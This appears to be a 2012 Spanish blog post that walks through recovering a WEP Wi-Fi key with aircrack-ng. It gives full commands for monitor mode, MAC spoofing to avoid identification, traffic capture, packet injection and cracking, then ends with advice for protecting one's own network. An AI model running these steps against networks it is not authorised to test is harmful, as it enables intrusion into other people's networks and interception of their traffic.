viernes, 4 de mayo de 2012

Obtener la clave de una red WIFI WEP

Obtener la clave con la que está protegida una red WIFI con seguridad WEP no es excesivamente complicado para una persona que tiene unos pocos conocimientos sobre informática, sabe buscar, leer y no le da miedo el terminal. Aún así hay que tener en cuenta que acceder a una red WIFI que no conocemos y que no sabemos de quien es no es recomendable ya que podemos ser victimas de que accedan a los datos que transmitimos.

Si aún sabiendo esto queremos acceder a una, para obtener la clave de las redes WIFI con seguridad WEP necesitamos una serie de programas que en la mayoría de distribuciones Linux son muy fáciles de instalar a través de sus gestoresde paquetes, necesitaremos aircrack-ng y macchanger. En el momento que probé a hacerlo con Arch Linux, parece que el el aircrack-ng tenía un problema con los canales de las WIFI asi que tuve que optar por usar BackTrack. La distribución de Linux BackTrack ya los trae instalados asi que solo tendriamos que desgargar una vesión de esta, grabarla en un CD y iniciar el equipo con ella.

Los pasos para obtener la clave de una red WIFI con seguridad WEP son:

Ponemos la tarjeta en modo promíscuo para escuchar todos los paquetes que circulen por la red:

$ sudo airmon-ng start wlan0


Cambiamos la dirección MAC de nuestra tarjeta de red inalámbrica para evitar trabajar con la nuestra y que nos identifiquen:

$ sudo ifconfig mon0 down

$ sudo macchanger -m 00:11:22:33:44:55 mon0

$ sudo ifconfig mon0 up


Escaneamos las redes que están cerca nuestro, buscamos una con cifrado WEP:

$ sudo airodump-ng mon0


Empezamos a volcar el tráfico de la red para que aircrack pueda averiguar la clave (este paso y los dos siguientes se realizan de forma simultanea en terminales diferentes):

$ sudo airodump-ng -c [CH] -w [ESSID] --bssid [BSSID] mon0


Inyectamos tráfico de forma artificial en la red para que el proceso sea más rápido:

$ sudo aireplay-ng -1 6000 -a [BSSID] -h 00:11:22:33:44:55 mon0

$ sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [BSSID] -h 00:11:22:33:44:55 mon0


Ponemos a aircrack a trabajar para descifrar la clave:

$ sudo aircrack-ng -z [ESSID]*.cap


Ya solo nos queda esperar un rato hasta que aircrack capture los paquetes suficientes y nos proporcione la clave en forma de 5 pares de caracteres.

Asi que no tengas una falsa sensación de seguridad por tener una red WIFI protegida con una seguridad WEP, incluso las redes WIFI con seguridad WPA/PSK que son un poco más seguras obtener la clave de estas también es posible. Dado que tener una red WIFI WEP o WPA/PSK no nos evita estar a salvo de intrusos algunas acciones que podemos tomar son: no usar WEP y al menos usar WPA/PSK (que tampoco es segura pero es mejor que WEP), cambiar la clave cada unas semanas (tampoco nos evita estar a salvo pero le será una molestia para quien intente acceder a nuestra WIFI), apagar la red WIFI si no la utilizamos y no dejarla siempre encendida (esto hará que alguien que este buscando una red WIFI a la que conectarse opte por otra que no sea la nuestra por no tener WIFI siempre que quiera), activa el filtrado MAC del router WIFI (así solo nuestros equipos podrán conectarse a eĺ) y ocultar la red no difundiendo el nombre, SSDI, de nuestra red (para alguien con pocos conocimientos optará primero por las redes que vea en vez de las redes WIFI ocultas).

Algunos motivos para evitar tener intrusos en nuestra red son disponer de todo el ancho de banda por el que pagamos, evitar que alguien utilice nuestra red para realizar acciones ilegales o acciones delictivas a través de ella, evitar que accedan a nuestros equipos y a nuestros documentos, claves de los servicios que utilizamos o datos de nuestras tarjetas bancarias o cuentas. Lo principal será prevenir estos poco frecuentes pero posibles problemas.

Referencia:
http://www.aircrack-ng.org/doku.php?id=aircrack-ng
http://www.atareao.es/ubuntu/conociendo-ubuntu/como-crackear-una-red-wifi-cifrada-con-wep-en-ubuntu/
http://www.pdaexpertos.com/Tutoriales/Comunicaciones/Seguridad_en_redes_inalambricas_WiFi.shtml